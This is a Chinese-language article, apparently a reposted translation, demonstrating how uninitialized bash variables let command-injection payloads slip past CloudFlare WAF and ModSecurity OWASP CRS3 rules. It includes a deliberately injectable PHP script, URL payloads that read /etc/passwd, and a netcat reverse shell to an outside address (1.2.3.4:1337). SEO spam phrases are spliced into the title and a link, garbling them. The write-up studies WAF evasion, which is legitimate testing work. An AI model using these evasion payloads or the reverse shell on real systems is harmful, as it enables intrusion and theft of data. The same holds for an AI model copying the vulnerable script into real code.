网站建设

城市: 北京 天津 湖北 广东 湖南 江西 河南 河北 陕西 吉林 辽宁 黑龙江 福建 上海 云南 贵州 四川 成都 更多
  当前位置:首页 > 行业快报 > 网站防护 >

绕过Clou建立一个网站费用dFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

微信公号

Web应用防火墙通常会被部署在Web客户端与Web服务器之间,以过滤来自服务器的恶意流量。而作为一名渗透测试人员,想要更好的突破目标系统,就必须要了解目标系统的WAF规则,以及想办法绕过该规则。本文将以CloudFlare WAF和ModSecurity OWASP CRS3为例,为大家进行演示如何使用未初始化的Bash变量,来绕过基于WAF正则表达式的过滤器和模式匹配。

未初始化变量

在之前两篇关于过WAF的文章中,我为大家介绍了如何在Linux系统上通过滥用bash globbing进程,来绕过WAF规则集并执行远程命令的技巧。在本文中我将向大家展示另一种,使用未初始化bash变量绕过基于正则表达式的过滤器和模式匹配的技巧。

echo "uninitialized_variable=$uninitialized_variable"

未初始化变量的值为null(根本没有值)。

uninitialized_variable=

可以看出,声明但未初始化和直接设为空值是相同的。

默认情况下,Bash会像Perl那样处理未初始化的变量:即视为空字符串!让我们从一个例子开始。

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

假设我们要执行cat /etc/passwd命令,我们可以使用以下语法:

cat$u /etc$u/passwd$u

可以看到,其中$u会被bash视为空字符串,且对结果输出也没有任何的影响。我们可以简单的验证下,通过echo命令打印$u。如下:

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

我们可以利用这个特性来绕过WAF规则,让我们使用CloudFlare WAF和ModSecurity OWASP核心规则集3.1进行一些测试。

CloudFlare WAF (pro plan)

和之前一样,我将在一个非常简单的PHP脚本上测试这种绕过技术。需要说明的是,我的测试并不针对CloudFlare WAF,测试的主要目的是为了提醒开发人员注重代码的安全性,以及知道可以采取哪些措施来修复或编写自定义的规则。

我启用了CloudFlare WAF所有的规则,并将安全级别调到了最高(似乎所有规则都基于OWASP CRS2……)。

简单的PHP测试脚本

<?php
        if(isset($_GET["host"])) {
                system("dig ".$_GET["host"]);
        }
?>

该脚本使用dig来解析主机GET参数上的给定主机名,例如:

/?host=www.google.com

响应结果:

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

显然,我们只需在主机名后加一个分号,就可以实现RCE攻击,例如:

/?host=www.google.com;ls+/

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

那么,我是否可以读取cat /etc/passwd文件呢? 让我们来尝试下:

/?host=www.google.com;cat+/etc/passwd

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

如上所示,WAF规则集阻止了我的请求。现在,让我们尝试使用未初始化变量绕过该规则集。

/?host=www.google.com;cat$u+/etc$u/passwd$u

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

请求放行!我成功读取到了/etc/passwd文件中的内容。┌(????)つ┣▇▇▇═──

CloudFlare有一些特定的规则来防止使用netcat获得反向shell,我决定尝试绕过它们。这里我将所有CloudFlare Specials上的规则设置为了“block”。

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

首先,我尝建立一个nc反向shell。

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

不出所料,CloudFlare阻止了我的请求。现在,我们在nc和/bin/bash后添加一些未初始化的bash变量,如下:

nc$u -e /bin$u/bash$u 1.2.3.4 1337

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

成功绕过并获取到了一个反向shell!

ModSecurity OWASP CRS3.1

使用CRS3.1后绕过难度大大增加,尤其是将Paranoia Level调到3后(CRS3上共有Paranoia Level 1~ 4 四个级别,第四个级别几乎无法绕过),这也是我喜欢CRS3的众多原因之一。

与CloudFlare上发生的情况不同,将CRS3.1级别调到Paranoia Level 3后,我的第一个测试被932100规则阻止,原因是“Unix命令注入”:

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

那么,我们该如何绕过这条规则呢?我尝试使用未初始化变量以 ;<space><uninitialized var><command> 的格式发送请求,看看是否可以成功绕过。如下:

?host=www.google.it;+$u+cat+/etc/passwd

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

可以看到,932100规则成功被绕过!但由于主机参数中包含etc/passwd字符串,我的请求再次被阻止。我能做的是在etc/passwd路径中,添加更多的未初始化变量,如下:

?host=www.google.it;+$u+cat+/etc$u/passwd$u

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

与CloudFlare WAF不同,如果我们将CRS3.1的Paranoia Level调为3,那么我们几乎不可能绕过以双引号包含$_GET["host"]的PHP脚本。不信我们可以试一试:

<?php
        if(isset($_GET["host"])) {
                system("dig "".$_GET["host"].""");
        }
?>

有了双引号后,除了分号之外我们还需要闭合或注释掉前后的双引号。例如: 

/?host=www.google.it";cat+/etc/passwd+#

你可能会问,RCE payload中添加了这么多额外的字符,难道不会被CloudFlare阻止吗?我们来看结果~成功绕过!

绕过CloudFlare WAF和ModSecurity OWASP CRS3核心规则集的技巧介绍

之所以无法绕过CRS3 Paranoia Level 3,主要是由于以下两条规则:

  • 942460 元字符异常检测警报 – 非单字字符重复:由于 ”,;, / 和 $ 字符,导致请求被阻止。
  • 942260 检测基本SQL身份验证绕过尝试 2/3:尝试使用特殊字符,导致请求被阻止。

而如果将Paranoia Level降至2,就可以被绕过。

/?host=www.google.it";+$u+cat+/etc$u/passwd+\#

总结

为什么阻止此类请求会如此困难?为什么W怎样开设微信公众号AF不阻止参数值中的$字符?原因很简单,因为那样会导致出现许多误报的情况。恕我直言,相比之下我更认同CRS3的做法,只在单个值中找到4个或更多重复的非单字字符时才进行阻止。这比阻止特定的字符更加聪明有效,且误报率也更低。

之前的文章

WAF绕过技术 #1

https://medium.com/secjuice/waf-evasion-techniques-718026d693d8

WAF绕过技术 #2

https://medium.com/secjuice/we微信游戏定制开发b-application-firewall-waf-evasion-techniques-2-125995f3e7b0

 

相关热词搜索:绕过 规则 核心 技巧 介绍

欢迎转载,转载请注明原文网址: https://www.seo-820.com/anquan/6302.html

网站设计范围

SERVICE SCOPE
  • 微信小程序公众号开发
    查看详情

    微信小程序公众号开发

      微信小程序已经火了一段时间了,之前一直也在关注,就这半年的发展来看,相对原生APP大部...... ..

  • 政府集团网站开发建设
    查看详情

    政府集团网站开发建设

    随着集团企业不断的迅速发展,很多集团公司现有的传统网站,网站样式,功能需求已经不能满足...... ..

  • 商城平台类型网站开发
    查看详情

    商城平台类型网站开发

    移动互联网时代,打造独立网上商城系统,不受限于第三方平台的监管,自主运营,打造多元化的...... ..

  • HTML5响应式网站设计开发
    查看详情

    HTML5响应式网站设计开发

    HTML5技术开发的自适应访问终端屏幕的新一代网站建设称H5响应式网站n就是页面的设计与开发应...... ..

  • 营销型网站策划设计
    查看详情

    营销型网站策划设计

    营销型网站近年来一直被企业所追捧,因为营销型网站的确有很多的优势和特点,营销型网站系统主...... ..

  • 企业展示型网站开发建设
    查看详情

    企业展示型网站开发建设

    企业展示型网站一般是主要是介绍公司实力,品牌,产品,案例及服务等这几个方面的基本内容,...... ..

我们的优势

  • 专业设计水准

    专业设计水准

    专业设计师出手、强大的网页前端开发能力,是确保网站项目成功的前提。标准严谨的设计流程,确保网站形象的整体视觉协调和舒适感。

  • 安全稳定易操作

    安全稳定易操作

    安全稳定、功能完善的网站应用程序,使得网站内容易管理易操作!优选网络网站应用平台独立研发,融入了我们多年以来对网站功能需求的理解

  • SEO优化引擎

    SEO优化引擎

    网站程序自带seo推广功能,任何页面的标题、描述、关键词皆可独立部署。

  • 周到的服务体系

    周到的服务体系

    成熟规范的售后服务体系,电话、qq、邮件对接专业客服,解决企业的后顾之忧

建站套餐

WEBSITE PACKAGE
  • 基础型网站(基础型)

    适合经济型网站需求企业用户

    参考价位:1880元/3年

    查看详情

    基础服务:

    域名:国际国内域名任选、ICP备案
    空间:智强云主机1G空间、安全稳定

    建站服务:

    创意模板可供选择
    含手机站、数据同步
    设计制作Banner图片3张
    图片处理并上传(30张以内)

    增值服务:

    免费提供后期操作培训
    每年6次网站修改(程序框架除外)
    网站流量监控系统
    营销辅助系统
    SEO优化设置系统

    立即咨询
  • 标准型网站(高级定制网站)

    适合中小型产品推广型企业

    参考价位:2980元/3年 送手机站

    查看详情

    基础服务:

    域名:国际国内域名任选、ICP备案
    空间:智强云主机1G空间、安全稳定

    建站服务:

    按要求设计网站效果图 
    纯人工HTML框架制作代码简洁易优化 
    设计制作Banner图片3张 
    图片处理并上传(50张以内)

    增值服务:

    免费提供后期操作培训(附教学视频)
    每年6次网站修改(程序框架除外)
    网站流量监控系统
    营销辅助系统
    SEO优化设置系统

    立即咨询
  • 商务型网站(营销型网站)

    对互联网营销有特殊需求的企业

    参考价位:5000元起步

    查看详情

    基础服务:

    域名:国际国内域名任选、ICP备案
    空间:阿里云5G独享空间、安全稳定

    建站服务:

    分析并定制网站建设方案 
    设计网站展示流程及框架效果图 
    设计产品专题页效果图 
    策划网站内部链轮结构

    增值服务:

    免费提供后期操作培训(附教学视频)
    智能站内TAG定位系统
    网站访客统计及流量监控系统
    全站TDK规则布局,优化好帮手
    自动提交收录及蜘蛛日志分析

    立即咨询
  • 豪华型网站(高端定制)

    适合高端企业及集团用户

    参考价位:面议

    查看详情

    基础服务:

    域名:国际国内域名任选、ICP备案
    空间:按需配置

    建站服务:

    提供策划方案 
    高端设计效果图 
    可选纯人工响应式开发 
    接受特殊化功能定制

    增值服务:

    免费提供后期操作培训
    拥有商之道CMS系统功能权限
    移动端特殊定制
    SEO优化指导
    VIP客服维护

    立即咨询

为什么选择我们

Why Choose Us

自适应响应式设计

采用响应式布局,自动适配PC端和移动端,根据不同设备环境响应布局,轻松实现跨平台浏览,用户体验更友好。

快速建站

简单易用,网站建设无需额外投入IT人员成本,良好的用户体验,让内容更新变得轻松。

SEO优化

全站生成静态html,每个页面都可以自定义标题(title),关键词(keywords)和网站描述(description),提升您网站在搜索引擎的排名!

安全稳定

采用PHP MYSQL架构开发,无论是安全性、稳定性、负载能力得到可靠保障;国内、香港、美国多个机房可供选择!

投入极低

高端网站,低价服务!最低仅600元即可拥有一套响应式html5网站,比本地网络公司价格低80%以上

售后服务

提供7x12的技术服务支持,快速响应,定期升级维护,保障网站的平稳运行,解决使用过程中遇到的各种问题。

Copyright © 2002-2018 seo-820.com 版权所有 粤ICP备15020538号-3    技术支持:优选网络

电脑版 | 移动版